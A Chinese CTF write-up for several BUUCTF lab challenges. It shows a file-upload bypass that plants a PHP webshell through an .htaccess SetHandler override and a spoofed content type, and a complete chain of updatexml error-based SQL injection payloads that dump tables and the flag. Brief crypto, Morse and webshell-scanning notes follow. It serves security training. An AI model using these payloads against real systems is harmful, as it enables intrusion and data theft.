BUUCTF-.htaccess-sql.fuzz-D盾
第七周第一次
目录
WEB
[MRCTF2020]你传你🐎呢
文件上传 我们进行尝试
设置一个 1.jpg的一句话木马
GIF89a然后抓包改后缀 发现都不行 于是想到让 图片作为php来解析
.htaccess
SetHandler application/x-httpd-php我们在上传一句话木马后 进行上传这个文件 让图片可以作为php来使用
进行抓包 然后更改
改为
image/jpeg 
上传成功 然后我们直接进行蚁剑链接图片即可
http://534a8674-4d20-4e4a-8e8e-1b82af752c3b.node4.buuoj.cn:81/upload/8fe5b08686372083104ab7b299db9c64/1.jpg
[极客大挑战 2019]HardSQL
打开环境
sql注入
开始判断类型
1'
说明是
username='1''这种 然后我们开始 万能密码
1' or '1'='1
很明显是过滤了什么 但是源代码又没有出现任何的过滤信息
这种时候 就使用bp进行爆破 看看过滤了什么
网络上找fuzz的字典
开始爆破
两个长度 发现 736是过滤的 751是没有过滤的
其中我们使用得到
空格 ---》()= ----》like开始查看数据库
我们使用报错注入
用户注入 admin'or(updatexml(1,concat(0x7e,database()),3))#admin密码注入 0'like(updatexml(1,concat(0x7e,database()),3))#
得到数据库
开始爆表
密码0'like(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#用户admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#
得到表 开始爆字段
密码 admin0'like(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),3))#用户admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),3))#
开始得到这些
密码admin0'like(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(geek.H4rDsq1))),3))#账号admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(geek.H4rDsq1))),3))#
发现长度不够
flag{ca65a277-9271-4a11-8a
使用left 和right
0'like(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)where(username)like('flag'))),3))#flag{ca65a277-9271-4a11-8a7c-30'like(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)where(username)like('flag'))),3))#7-9271-4a11-8a7c-30c698f0f31b}flag{ca65a277-9271-4a11-8a7c-30c698f0f31b}Crypto
萌萌哒的八戒
猪圈密码
flag{whenthepigwanttoeat}传统知识+古典密码
两个文件 一个一个看
一甲子=60年
28 30 23 08 17 10 16 30+6088 90 83 68 77 70 76 90asciiXZSDMFLZ然后开始尝试栅栏密码等
CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码
BUUCTF—传统知识+古典密码_buuctf 传统知识+古典密码_小常吃不下了的博客-CSDN博客
得到flag
Misc
假如给我三天光明
盲文
kmdonowg解压文件
听音乐是莫斯密码
CTFWPEI08732?23Dflag{wpei08732?23dz}后门查杀
webshell查杀工具:D盾
查杀
访问include
来源地址:https://blog.csdn.net/m0_64180167/article/details/130054055
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
